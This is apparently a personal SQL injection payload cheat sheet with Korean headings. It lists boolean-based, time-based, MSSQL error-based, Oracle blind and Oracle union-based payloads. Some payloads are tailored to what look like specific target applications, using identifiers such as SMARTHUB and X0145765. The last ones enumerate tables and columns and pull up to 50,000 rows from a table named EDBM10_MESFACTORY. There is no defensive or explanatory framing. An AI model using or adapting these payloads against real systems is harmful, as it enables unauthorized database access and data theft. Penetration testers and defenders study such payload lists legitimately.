###SQL INJECTION

###참거짓
, (case when 1=1 then 1 else 1/0 end) desc
, (case when 1=0 then 1 else 1/0 end) desc

' and 1'1='1
' and 1'1='2

',(SELECT+(CASE+WHEN+(1=1)+THEN+1+1ELSE+CAST(1+AS+INT)/0+END)+FROM+DUAL)
',(SELECT+(CASE+WHEN+(1=2)+THEN+1+1ELSE+CAST(1+AS+INT)/0+END)+FROM+DUAL)

,+(case+when+1=1+then+1+else+1/0+end)
,+(case+when+1=2+then+1+else+1/0+end)

<case+when+1=1+then+1+else+1/0+end>
<case+when+1=2+then+1+else+1/0+end>

||(CASE+WHEN+1=1+THEN+1+ELSE+-1+END)
||(CASE+WHEN+1=2+THEN+1+ELSE+-1+END)

)and('1'='1'"
)and('1'='2'"

'+AND+'1%'='1
'+AND+'1%'='2

##time based Injection
;select+case+when+1=1+then+pg_sleep(5)+else+pg_sleep(0)+end--
;select+case+when+1=2+then+pg_sleep(5)+else+pg_sleep(0)+end--
'||(select case when 1=1 then 'test' else 'SQL Injection Test' end from dual)||'
'||(select case when 1=2 then 'test' else 'SQL Injection Test' end from dual)||'

'%LOT' and (db_name())>1 and MAKER='LOT%'
and (db_name())>1


###MSSQL Error Based SQL Injection
'and 1=convert(int, @@version)-'
' and (@@version()>1 and MAKER='LOT
' and (db_name())>1 and MAKER='LOT
' and (user_name())>1 and MAKER='2024
' and (host_name())>1 and MAKER='LOT
' and ((select top 1 TABLE_NAME FROM information_schema.TABLES))>1 and MAKER='LOT
' and ((SELECT top 1 column_name from information_schema.columns))>1 and MAKER='LO
') and (select len(@@SERVERNAME) > 0) -- -


###ORACLE Blind Bases injection
데이터 베이스 명
X0145765' and SUBSTR((SELECT SYS.DATABASE_NAME FROM DUAL), 1,1)='A'--
테이블 갯수
X0145765' AND (SELECT COUNT(*) FROM all_tables) = 120 --
1열 테이블 글자 수
X0145765' AND (SELECT LENGTH(table_name) FROM all_tables WHERE ROWNUM=1)=4 -- 
1열 테이블 명
X0145765' AND SUBSTR((SELECT table_name FROM all_tables WHERE ROWNUM=1), 1, 1) = 'a' --
테이블 컬럼 명
X0145765' AND (SELECT COUNT(*) FROM all_tab_columns WHERE table_name='DUAL')= 1 --
1열 테이블 컬럼 갯수
X0145765' AND (SELECT COUNT(*) FROM all_tab_columns WHERE table_name= 'DUAL')=1 --
첫번째 컬럼 명 길이
"X0145765' AND LENGTH((SELECT column_name FROM all_tab_columns WHERE table_name = 'DUAL' AND ROWNUM = 1))=5 --
컬럼 내 데이터 갯수
X0145765' AND (SELECT COUNT(DUMMY) FROM DUAL)=1 --

###ORACLE Union Based Injection
SMARTHUB' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM dual --
SMARTHUB' UNION SELECT NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM all_tables WHERE ROWNUM <= 1000 --
SMARTHUB' UNION SELECT NULL,NULL,column_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM all_tab_columns WHERE table_name = 'EDBM10_MESFACTORY' AND ROWNUM <= 100 --
SMARTHUB' UNION SELECT NULL,NULL,NULL,TO_CHAR(CRE_TM),CRE_USR,TO_CHAR(DAYPERWEEK),DESCRIPTION,TO_CHAR(SHIPPINGRESERFROM_TM),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM EDBM10_MESFACTORY WHERE ROWNUM <= 50000 --



